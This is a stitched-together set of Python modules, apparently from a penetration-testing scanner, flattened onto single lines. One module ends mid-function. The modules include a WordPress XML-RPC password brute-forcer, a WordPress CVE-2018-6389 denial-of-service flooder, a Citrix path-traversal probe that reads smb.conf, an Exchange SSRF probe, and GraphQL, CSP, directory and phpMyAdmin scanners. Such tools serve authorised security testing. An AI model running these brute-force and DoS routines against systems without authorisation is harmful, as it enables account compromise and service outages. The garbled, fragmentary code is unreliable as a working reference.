def graphql(target, port, timeout_sec, socks_proxy): try: s = conn(target_to_host(target), port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target headers = { "User-Agent": random.choice(useragents()), "Accept": "text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.9", "Accept-Encoding": "gzip, deflate, br", } query = """{ __schema { types { name } } } """ params = {"query": query, "variables": "{}"} tempTarget = target global final_endpoint final_endpoint = '' for endpoint in graphql_list(): tempTarget += endpoint try: req = requests.post(tempTarget, json=params, headers=headers, verify=False, timeout=timeout_sec) tempTarget = target except Exception: return False else: if req.status_code == 200: json_data = json.loads(req.text) if json_data.get('data') or json_data.get('errors'): return True return False except Exception: # some error warning return False
def content_policy(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd, check_source_flag): try: s = conn(target, port, timeout_sec, socks_proxy) global weak weak = False if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target headers = {'User-agent': random.choice(useragents.useragents())} req = requests.get(target, headers=headers, timeout=timeout_sec, verify=False) try: weak = False csp = req.headers['Content-Security-Policy'] if 'unsafe-inline' in csp or 'unsafe-eval' in csp: weak = True return False except Exception as e: if check_source_flag: soup = BeautifulSoup(req.text, "html.parser") meta_tags = soup.find_all( 'meta', {'http-equiv': 'Content-Security-Policy'}) if len(meta_tags) == 0: return True directives = meta_tags[0].attrs['content'] if 'unsafe-inline' in directives or 'unsafe-eval' in directives: weak = True return False else: return True except Exception as e: # some error warning return False
def simple_test_open_url(url): """ Simply open a URL using GET request. Args: url: url to open Returns: True if response available, otherwise False """ try: return requests.get(url, headers={ "User-Agent": random.choice(useragents.useragents()) }).status_code except Exception as _: return False
def citrix_vuln(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): try: s = conn(target, port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target user_agent_list = useragents.useragents() user_agent = {'User-agent': random.choice(user_agent_list)} # as a pre-requisite check that CSS return the word citrix req0_url = target + '/vpn/js/rdx/core/css/rdx.css' req0 = requests.get(req0_url, timeout=10, headers=user_agent, verify=False) if req0.status_code == 200 and 'citrix' in req0.text.lower(): info('Citrix appliance detected: ' + target) # now check if response code 200 is returned for the following url: req_url = target + '/vpn/../vpns/cfg/smb.conf' req = requests.get(req_url, timeout=10, headers=user_agent, verify=False) if req.status_code == 200 and 'lmhosts' in req.text.lower(): return True else: return False else: return False except Exception as e: # some error warning return False
def msexchange_vuln(target, port, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd): try: s = conn(target, port, timeout_sec, socks_proxy) if not s: return False else: if target_type(target) != "HTTP" and port == 443: target = 'https://' + target if target_type(target) != "HTTP" and port == 80: target = 'http://' + target cookies = { "X-AnonResource": "true", "X-AnonResource-Backend": "localhost/ecp/default.flt?~3", "X-BEResource": "localhost/owa/auth/logon.aspx?~3", } headers = {'User-agent': random.choice(useragents.useragents())} if target.endswith("/"): target = target[:-1] path = '/owa/auth/x.js' req = requests.get(target + path, cookies=cookies, verify=False, headers=headers, timeout=timeout_sec) if req.status_code in [500, 503]: try: header_server = req.headers['x-calculatedbetarget'] if 'localhost' in header_server or "NegotiateSecurityContext" in req.text: return True else: return False except Exception as e: return False except Exception as e: warn(messages(language, 'no_response')) return False
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type( target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6': # rand useragent user_agent_list = useragents.useragents() headers = {'User-agent': random.choice(user_agent_list), 'Content-Type': 'text/xml'} # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[ extra_requirement] = methods_args[extra_requirement] extra_requirements = new_extra_requirements threads = [] if users is None: users = extra_requirements["wp_users"] if passwds is None: passwds = extra_requirements["wp_passwds"] if ports is None: ports = extra_requirements["wp_xmlrpc_brute_ports"] if verbose_level > 3: total_req = len(users) * len(passwds) * len (ports) else: total_req = len(users) * len(passwds) * len(ports) thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) trying = 0 if target_type(target) != "HTTP": target = 'https://' + target for port in ports: if test(str(target), port, retries, timeout_sec, headers, socks_proxy, verbose_level, trying, total_req, total, num, language) == True: keyboard_interrupt_flag = False for user in users: for passwd in passwds: #print(user + " " + passwd) t = threading.Thread(target=check, args=( user, passwd, target, port, headers, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info(messages(language, "trying_message").format(trying, total_req, num, total, target_to_host(target), port, 'wp_xmlrpc_brute')) while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: keyboard_interrupt_flag = True break if keyboard_interrupt_flag: break else: warn(messages(language, "open_error").format(target)) # wait for threads kill_switch = 0 kill_time = int( timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() == 1 or kill_switch == kill_time: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) os.remove(thread_tmp_filename) else: warn(messages(language, "input_target_error").format( 'wp_xmlrpc_brute', target))
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type( target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6': # rand useragent user_agent_list = useragents() headers = {'User-agent': random.choice(user_agent_list), 'Content-Type': 'text/xml'} # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[ extra_requirement] = methods_args[extra_requirement] extra_requirements = new_extra_requirements threads = [] if ports is None: ports = extra_requirements["wp_xmlrpc_dos_vuln_ports"] if verbose_level > 3: total_req = len(ports) else: total_req = len(ports) thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) trying = 0 if target_type(target) != "HTTP": target = 'https://' + target for port in ports: if test(str(target), port, headers, socks_proxy) is True: keyboard_interrupt_flag = False t = threading.Thread(target=check, args=(target, port, headers, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info(messages(language, "trying_message").format(trying, total_req, num, total, target_to_host(target), port, 'wp_xmlrpc_dos_vuln')) while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: keyboard_interrupt_flag = True break if keyboard_interrupt_flag: break else: warn(messages(language, "open_error").format(target)) # wait for threads kill_switch = 0 kill_time = int( timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() == 1 or kill_switch == kill_time: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) if thread_write == 1 and verbose_level != 0: info(messages(language, "no_vulnerability_found").format( 'XML-RPC')) data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': port, 'TYPE': 'wp_xmlrpc_dos_vuln', 'DESCRIPTION': messages(language, "no_vulnerability_found").format("XML-RPC DOS attacks"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n" __log_into_file(log_in_file, 'a', data, language) os.remove(thread_tmp_filename) else: warn(messages(language, "input_target_error").format( 'wp_xmlrpc_dos_vuln', target))
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type( target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6': # rand useragent user_agent_list = useragents.useragents() http_methods = ["GET", "HEAD"] user_agent = {'User-agent': random.choice(user_agent_list)} # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[ extra_requirement] = methods_args[extra_requirement] extra_requirements = new_extra_requirements if extra_requirements["dir_scan_http_method"][0] not in http_methods: warn(messages(language, "dir_scan_get")) extra_requirements["dir_scan_http_method"] = ["GET"] random_agent_flag = True if extra_requirements["dir_scan_random_agent"][0] == "False": random_agent_flag = False threads = [] total_req = len(extra_requirements["dir_scan_list"]) thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) trying = 0 if target_type(target) != "HTTP": target = 'http://' + target if test(str(target), retries, timeout_sec, user_agent, extra_requirements["dir_scan_http_method"][0], socks_proxy, verbose_level, trying, total_req, total, num, language) == 0: keyboard_interrupt_flag = False for idir in extra_requirements["dir_scan_list"]: if random_agent_flag: user_agent = {'User-agent': random.choice(user_agent_list)} if target.endswith("/"): target = target[:-1] if idir.startswith("/"): idir = idir[1:] t = threading.Thread(target=check, args=( target + '/' + idir, user_agent, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, retries, extra_requirements[ "dir_scan_http_method"][0], socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info(messages(language, "trying_message").format(trying, total_req, num, total, target_to_host(target), "default_port", 'dir_scan')) while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: keyboard_interrupt_flag = True break if keyboard_interrupt_flag: break else: warn(messages(language, "open_error").format(target)) # wait for threads kill_switch = 0 kill_time = int( timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() == 1 or kill_switch == kill_time: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) if thread_write == 1: info(messages(language, "directory_file_404").format( target, "default_port")) if verbose_level != 0: data = json.dumps( {'HOST': target_to_host(target), 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'dir_scan', 'DESCRIPTION': messages(language, "no_open_ports"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) __log_into_file(log_in_file, 'a', data, language) os.remove(thread_tmp_filename) else: warn(messages(language, "input_target_error").format('dir_scan', target))
def start( target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd, ): # Main function if ( target_type(target) != "SINGLE_IPv4" or target_type(target) != "DOMAIN" or target_type(target) != "HTTP" or target_type(target) != "SINGLE_IPv6" ): # rand useragent http_methods = ["GET", "HEAD"] # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[extra_requirement] = methods_args[ extra_requirement ] extra_requirements = new_extra_requirements if extra_requirements["pma_scan_http_method"][0] not in http_methods: warn(messages(language, "dir_scan_get")) extra_requirements["pma_scan_http_method"] = ["GET"] thread_tmp_filename = "{}/tmp/thread_tmp_".format( load_file_path() ) + "".join( random.choice(string.ascii_letters + string.digits) for _ in range(20) ) __log_into_file(thread_tmp_filename, "w", "1", language) default_ports = [80, 443] request = """{0} __target_locat_here__{{0}} \ HTTP/1.1\nUser-Agent: {1}\n\n""".format( extra_requirements["pma_scan_http_method"][0], random.choice(useragents.useragents()) if extra_requirements["pma_scan_random_agent"][0].lower() == "true" else "Mozilla/5.0 (Windows; U; Windows NT 5.1; \ en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5", ) status_codes = [200, 401, 403] condition = "response.status_code in {0}".format(status_codes) message = messages(language, "found") sample_message = ( '"' + message + '"' + """.format(response.url, response.status_code,\ response.reason)""" ) sample_event = { "HOST": target_to_host(target), "USERNAME": "", "PASSWORD": "", "PORT": "PORT", "TYPE": "pma_scan", "DESCRIPTION": sample_message, "TIME": now(), "CATEGORY": "scan", "SCAN_ID": scan_id, "SCAN_CMD": scan_cmd, } counter_message = messages(language, "phpmyadmin_dir_404") __repeater( request, [extra_requirements["pma_scan_list"]], timeout_sec, thread_number, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, scan_id, scan_cmd, condition, thread_tmp_filename, sample_event, sample_message, target, ports, default_ports, counter_message, ) else: warn( messages(language, "input_target_error").format("pma_scan", target) )
import struct import re import os from OpenSSL import crypto import ssl from core.alert import * from core.targets import target_type from core.targets import target_to_host from core.load_modules import load_file_path from lib.socks_resolver.engine import getaddrinfo from core._time import now from core.log import __log_into_file import requests from lib.payload.wordlists import useragents USER_AGENT = {'User-agent': random.choice(useragents.useragents())} def extra_requirements_dict(): return {"cms_detection_ports": [80, 443]} def conn(targ, port, timeout_sec, socks_proxy): try: if socks_proxy is not None: socks_version = socks.SOCKS5 if socks_proxy.startswith( 'socks5://') else socks.SOCKS4 socks_proxy = socks_proxy.rsplit('://')[1] if '@' in socks_proxy: socks_username = socks_proxy.rsplit(':')[0] socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language, verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function if target_type(target) != 'SINGLE_IPv4' or target_type( target) != 'DOMAIN' or target_type( target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6': # rand useragent user_agent_list = useragents.useragents() user_agent = {'User-agent': random.choice(user_agent_list)} limit = 1000 # requirements check new_extra_requirements = extra_requirements_dict() if methods_args is not None: for extra_requirement in extra_requirements_dict(): if extra_requirement in methods_args: new_extra_requirements[extra_requirement] = methods_args[ extra_requirement] extra_requirements = new_extra_requirements random_agent_flag = True if extra_requirements["wordpress_dos_cve_2018_6389_vuln_random_agent"][ 0] != "True": random_agent_flag = False if extra_requirements["wordpress_dos_cve_2018_6389_vuln_no_limit"][ 0] != "False": limit = -1 threads = [] total_req = limit filepath = os.path.dirname(os.path.dirname(os.path.realpath(__file__))) thread_tmp_filename = '{}/tmp/thread_tmp_'.format( load_file_path()) + ''.join( random.choice(string.ascii_letters + string.digits) for _ in range(20)) __log_into_file(thread_tmp_filename, 'w', '1', language) trying = 0 if target_type(target) == 'SINGLE_IPv4' or target_type( target) == 'DOMAIN': url = 'http://{0}/'.format(target) else: if target.count(':') > 1: __die_failure(messages(language, "insert_port_message")) http = target.rsplit('://')[0] host = target_to_host(target) path = "/".join( target.replace('http://', '').replace('https://', '').rsplit('/')[1:]) url = http + '://' + host + '/' + path if test(url, retries, timeout_sec, user_agent, socks_proxy, verbose_level, trying, total_req, total, num, language, False, log_in_file, scan_id, scan_cmd, thread_tmp_filename) != 0: warn(messages(language, "open_error").format(url)) return info(messages(language, "DOS_send").format(target)) n = 0 t = threading.Thread( target=test, args=(url, retries, timeout_sec, user_agent, socks_proxy, verbose_level, trying, total_req, total, num, language, True, log_in_file, scan_id, scan_cmd, thread_tmp_filename)) t.start() keyboard_interrupt_flag = False while (n != limit): n += 1 if random_agent_flag: user_agent = {'User-agent': random.choice(user_agent_list)} t = threading.Thread(target=send_dos, args=(url, user_agent, timeout_sec, log_in_file, language, time_sleep, thread_tmp_filename, retries, socks_proxy, scan_id, scan_cmd)) threads.append(t) t.start() trying += 1 if verbose_level > 3: info( messages(language, "trying_message").format( trying, total_req, num, total, target_to_host(target), port, 'wordpress_dos_cve_2018_6389_vuln')) try: if int(open(thread_tmp_filename).read().rsplit()[0]) == 0: if limit != -1: break except Exception: pass while 1: try: if threading.activeCount() >= thread_number: time.sleep(0.01) else: break except KeyboardInterrupt: keyboard_interrupt_flag = True break if keyboard_interrupt_flag: break # wait for threads kill_switch = 0 kill_time = int(timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1 while 1: time.sleep(0.1) kill_switch += 1 try: if threading.activeCount() == 2 or kill_switch == kill_time: break except KeyboardInterrupt: break thread_write = int(open(thread_tmp_filename).read().rsplit()[0]) if thread_write == 1: info( messages(language, "no_vulnerability_found").format( "wordpress_dos_cve_2018_6389_vuln")) if verbose_level != 0: data = json.dumps({ 'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'wordpress_dos_cve_2018_6389_vuln', 'DESCRIPTION': messages(language, "no_vulnerability_found").format( "wordpress_dos_cve_2018_6389_vuln"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd }) __log_into_file(log_in_file, 'a', data, language) os.remove(thread_tmp_filename) else: warn( messages(language, "input_target_error").format( 'wordpress_dos_cve_2018_6389_vuln', target))